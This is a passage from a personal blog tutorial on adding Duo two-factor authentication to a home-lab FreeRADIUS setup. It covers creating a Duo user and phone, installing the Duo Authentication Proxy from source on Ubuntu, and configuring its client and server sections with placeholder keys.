COPY clients.conf /etc/freeradius/3.0/clients.conf

# Create a symbolic link
RUN ln -s /etc/freeradius/3.0/mods-available/pam /etc/freeradius/3.0/mods-enabled/pam

# Expose the port
EXPOSE 1812/udp 1813/udp 18120/udp

# Run FreeRADIUS as a foreground process
CMD ["freeradius","-f"]

Note

This Dockerfile references local files that I already have. My first FreeRADIUS article might be able to help you. If not, you could always read the documentation.

Duo user creation

Duo user creation

Once you’ve created your account, it’s time to create a Duo user. This user must match the user accounts in your primary authentication source. In my case, it is the FreeRADIUS server.

If you have a paid account and use OpenLDAP, Windows AD, or Azure AD, there’s a Directory Synchronization feature that automatically imports the accounts to Duo.

Alternatively, you can import users by creating a CSV file. Since I only have one account, I don’t need to import users.

Add phone

Once you click on the Add Phone button, you will see a screen where you can add the user’s full name, email address, phone number, etc. For my purpose, I only added a phone.

Add phone

In the next screen, this is where you will add the user’s phone number.

Add phone number

2FA device

Once you add the user’s phone number, it will automatically add a 2FA device. This next screen will allow you to change the device information.

2FA device

Activate Duo Mobile

The next step is to activate the Duo Mobile app. On the screen where you were just at, click on the Activate Duo Mobile link. It will take you to another screen where you will click the Generate Duo Mobile Activation Code button.

The next screen will allow you to send instructions by SMS to the user.

Note

In my limited testing, this will count towards your telephony credits. The free account comes with over 490+ credits, so this isn’t a big deal. You can buy additional credits should you need it.

Protect an application

Since there’s no Duo Authentication Proxy as an application in the list, we need to use the Partner Auth API as the application.

Duo protect an application

Once you click the Protect button, the next screen will show the information you need when you start configuring the Duo authentication proxy host. Make sure to jot down the integration key, secret key, and API hostname.

Duo Partner Auth API

Feel free to change the name of the application. The application name is the one that will show up in Duo mobile app when there’s a push.

Do you find this content useful? If so, consider buying me a coffee! ☕


Installing Duo Authentication Proxy

This step assumes that you have an Ubuntu Linux VM already installed and updated. To install Duo authentication proxy, issue the commands below.

$ sudo apt-get install build-essential libffi-dev perl zlib1g-dev make -y
$ wget https://dl.duosecurity.com/duoauthproxy-latest-src.tgz
$ tar -zxf duoauthproxy-latest-src.tgz

At this time of writing, the latest version is 4.0.1.8318f80. The directory may be different when you download the installer. That said, feel free to change the directory name in the command shown below.

Note

The make command may take a while to finish.

$ cd duoauthproxy-4.0.1-8318f80-src
$ sudo make
$ cd duoauthproxy-build
$ sudo ./install

When the installation process asks you where you wish to install the Duo authentication proxy, you can either hit Enter or change it to another directory. I prefer it in /etc/duoauthproxy, so that’s where everything will sit for my installation. Everything else just hit Enter to accept the default except for the last question. Type Yes and hit Enter

In what directory do you wish to install the Duo Authentication Proxy?
[/opt/duoauthproxy] /etc/duoauthproxy

Enter the name of a user account under which the Authentication Proxy should be run. We recommend a non-privileged and locked down account.
Or you can press <Enter> and our default locked down user will be created for you:
[duo_authproxy_svc]

Enter the name of a group under which the Authentication Proxy logs will be readable. Or press <Enter> and a default group will be created for you:
[duo_authproxy_grp]

Create an initialization script to run the proxy upon startup? [Yes/no] Yes

Optional

Delete the Duo files that you downloaded and extracted.

$ cd ~
$ sudo rm -rf duoauthproxy-4.0.1-8318f80-src
$ rm duoauthproxy-latest-src.tgz

Configuring Duo Authentication Proxy

In this step, you will need to modify the authproxy.cfg file. This configuration file will contain information about your Duo integration and secret key, authentication source, etc.

Before modifying the file, create a backup so you can always revert to the original file. Use the command below to create a backup configuration file.

$ sudo cp /etc/duoauthproxy/conf/authproxy.cfg /etc/duoauthproxy/conf/authproxy.cfg.bak

There are three sections in the configuration file: the main, client, and server. The main configuration section is optional. This section is where you can specify which interface to use, HTTP proxy info, log size, etc. In my lab environment, I don’t need any of them, so I left the default configuration.

The next configuration section is the client section. This section is where you will define the authentication source. At this time of writing, the configuration file has [ad_client] as the default. Since I use the FreeRADIUS server as my authentication source, I will need to either delete or comment it out. I chose to comment it out.

#[ad_client]
#host=
#service_account_username=
#service_account_password=
#search_dn=

[radius_client]
host=192.168.10.51
secret=radius-key-here

The last configuration section is the server section. This section is where you will add your Duo integration key, secret key, API hostname, clients, etc.

[radius_server_auto]
ikey=integration-key-here
skey=secret-key-here
api_host=api-hostname.duosecurity.com
radius_ip_1=192.168.20.0/24
radius_secret_1=radius-key-here
radius_ip_2=192.168.30.2-10
radius_secret_2=radius-key-here
radius_ip_3=192.168.40.100
radius_secret_3=radius-key-here
failmode=safe
client=radius_client
port=1812

Final Thoughts

It is pretty generous for Cisco to continue offering the free-tier pricing. I hope they don’t stop offering it for free since I happen to like it. While the free-tier is limited in features, it is enough for my needs.

As a matter of fact, I switched to Duo MFA as my 2FA solution for my remote access VPN. I configured my Ubiquiti EdgeRouter to point to my Duo Authentication Proxy host instead of my previous 2FA solution. It is no longer necessary for me to memorize the TOTP code before connecting to my VPN using my iOS devices.

You might like to read

Securing SSH with Google Authenticator
Adding Two-Factor Authentication to FreeRADIUS
Adding Two-Factor Authentication to TACACS+

BUY ME COFFEE ☕

Did you find this content useful? Show your appreciation by buying me a coffee!